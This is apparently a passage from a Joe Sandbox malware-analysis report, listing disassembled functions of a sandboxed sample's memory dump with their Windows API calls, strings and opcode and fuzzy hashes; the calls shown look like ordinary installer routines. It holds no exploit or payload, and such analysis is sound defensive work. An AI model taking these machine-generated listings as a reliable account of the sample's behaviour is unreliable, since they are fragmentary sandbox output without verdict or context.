                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6de4baa14c4a6f57e7e0fa87305810bbac6c938c7252870eebf96be844e5f735
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3c550b8be62ae6962ae8a8b2bb2136c6a1766c1456238aff6c9f059f5d92f743
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6de4baa14c4a6f57e7e0fa87305810bbac6c938c7252870eebf96be844e5f735
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1F06D75E00208B6DF20EED88C45BAFB3BCAF14B05F204566E910E7381F6789B448B59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459805,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459715
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 47109696-2631785700
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4c96ae261619d9cb3d7b753369be860faed2130504991989f0550c0ea906856f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5fc53f2980ca067f7fdefaa7aa50a153e5e830959166a8c5adde0da5508e813c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c96ae261619d9cb3d7b753369be860faed2130504991989f0550c0ea906856f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97F0AF35720150DBCB10EF5AE885B4E6298DB99396F50403BB985CB263C77CCC06CA99
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B46,00000000,00453BE9,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FD9,00000000), ref: 0042D91A
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D920
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-4063490227
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f90212481b0829995c930a53c7acd5c1d2ca0672da2f778c3c159a35fad60eb8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1097081faf8e12b72459453f22f39748745641366cc83a46a0cb0e3cd7246884
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f90212481b0829995c930a53c7acd5c1d2ca0672da2f778c3c159a35fad60eb8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FE04FE1B40B1112D71066BA5C82B6B158E4B84724F90443B3994E62C3DDBCD9885A5D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAE0), ref: 0042EB72
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB78
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-260599015
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0fcc82f810ad7712b712005734c0e7e7f4c4755c19e1c7144c512dae05afdcd4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 186c8a8b24504359f9bd95d8817b94a00a7cf61d77d8ea7090d5fad6c77db3b3
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fcc82f810ad7712b712005734c0e7e7f4c4755c19e1c7144c512dae05afdcd4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CD0C792312732666D10F1F73CD1DBB098C89116753544477F505E5241D55DDD01196D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004985C2), ref: 0044F78F
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F795
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: NotifyWinEvent$user32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-597752486
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d260ac245a95ba778a84e64f4678a7c97134b6bce19bccee0962fec8ae9a2771
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: adaf68bc035e952e092e397114f6a1653fed54d9058db7208dfb757fc5d15743
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d260ac245a95ba778a84e64f4678a7c97134b6bce19bccee0962fec8ae9a2771
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7E012F4E417049DEF00BBF5BA86B1E3A90E764718B01417FF404A62A2DB7C440C8E5D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498618,00000001,00000000,0049863C), ref: 00498342
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498348
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-834958232
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9cb413b2176f50c76fea63ef53080ec325e820140f3784e0ca009a77fe8837c6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7eda4cb16e2cba450c320cc229382d7be1fc12bfd2fbc27455de3eb8489cf644
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9cb413b2176f50c76fea63ef53080ec325e820140f3784e0ca009a77fe8837c6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88B092C128174298AC7032FA0C02A1F08084882F28718083F3C48F50C2CD6ED804182D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6B9
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6CB
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6DD
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6EF
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B701
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B713
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B725
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B737
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B749
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B75B
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B76D
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B77F
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B791
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B7A3
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7B5
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7C7
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464975
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                                                                                  • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2238633743-2683653824
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6679ec7baf936cfa82dcc9dbfb17d68d2c51c027667db27e6010a1916441cd76
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ef62b78e1ecbbf86accf82cc5e54c74759ffbda80f6f2c7107c350d82a6c33f4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6679ec7baf936cfa82dcc9dbfb17d68d2c51c027667db27e6010a1916441cd76
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48B092E06E2700A88E00B7FA2887B0B104895D0B1DB56063F704979092EB7C4008CD6E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D4A8,?,?,?,?,00000000,0047D5FD,?,?,?,00000000,?,0047D70E), ref: 0047D484
                                                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,0047D4AF,0047D4A8,?,?,?,?,00000000,0047D5FD,?,?,?,00000000,?,0047D70E,00000000), ref: 0047D4A2
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Find$CloseFileNext
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2066263336-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8e11c2e85c2ccaffd34a83076676189e08046c434ae76c0902574934c104601f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2979fa4f850f67a6d1e6d53d287e6b8f4dfe67a5ddfa55c2aaa4ecb03bfc0e13
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e11c2e85c2ccaffd34a83076676189e08046c434ae76c0902574934c104601f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA812D70D0024DAFDF11DFA5CC55ADFBBB9EF49308F5080AAE808A7291D6399A46CF54
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?,?,00000000), ref: 0047F8AA
                                                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?,?), ref: 0047F8B7
                                                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0047F9D0,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D), ref: 0047F9AC
                                                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,0047F9D7,0047F9D0,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?), ref: 0047F9CA
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Find$CloseFileNext
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2066263336-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a51c321032a6822f8687f4756751f7508677d78abc23393d1367f70f4628dca3
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d4c1b09f85a1e3ce5f066f5119f691750f955bf6e0a6470712ab8dbd39f482a6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a51c321032a6822f8687f4756751f7508677d78abc23393d1367f70f4628dca3
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80513E71A00648AFCB10EF65CC45ADEB7B8AB88315F1085BAA818E7351D7389F49CF59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetMenu.USER32(00000000), ref: 00421371
                                                                                                                                                                                                                                                                                                                                                                  • SetMenu.USER32(00000000,00000000), ref: 0042138E
                                                                                                                                                                                                                                                                                                                                                                  • SetMenu.USER32(00000000,00000000), ref: 004213C3
                                                                                                                                                                                                                                                                                                                                                                  • SetMenu.USER32(00000000,00000000), ref: 004213DF
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Menu
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3711407533-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042EE40: GetTickCount.KERNEL32 ref: 0042EE46
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042EC98: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECCD
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00475991,?,?,0049C1D0,00000000), ref: 0047587A
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CountErrorFileLastMoveTick
                                                                                                                                                                                                                                                                                                                                                                  • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2406187244-2685451598
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00413D56
                                                                                                                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00413E0E
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418ED0: 6FA2C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049B628), ref: 00418EEC
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049B628), ref: 00418F09
                                                                                                                                                                                                                                                                                                                                                                  • SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CursorDesktopWindow$Show
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2074268717-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
                                                                                                                                                                                                                                                                                                                                                                  • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
                                                                                                                                                                                                                                                                                                                                                                  • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
                                                                                                                                                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: LoadString$FileMessageModuleName
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 704749118-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 951c1155a055777031086f0b90c3083af3c2960daf331f13f5541ebbba7c3e7d
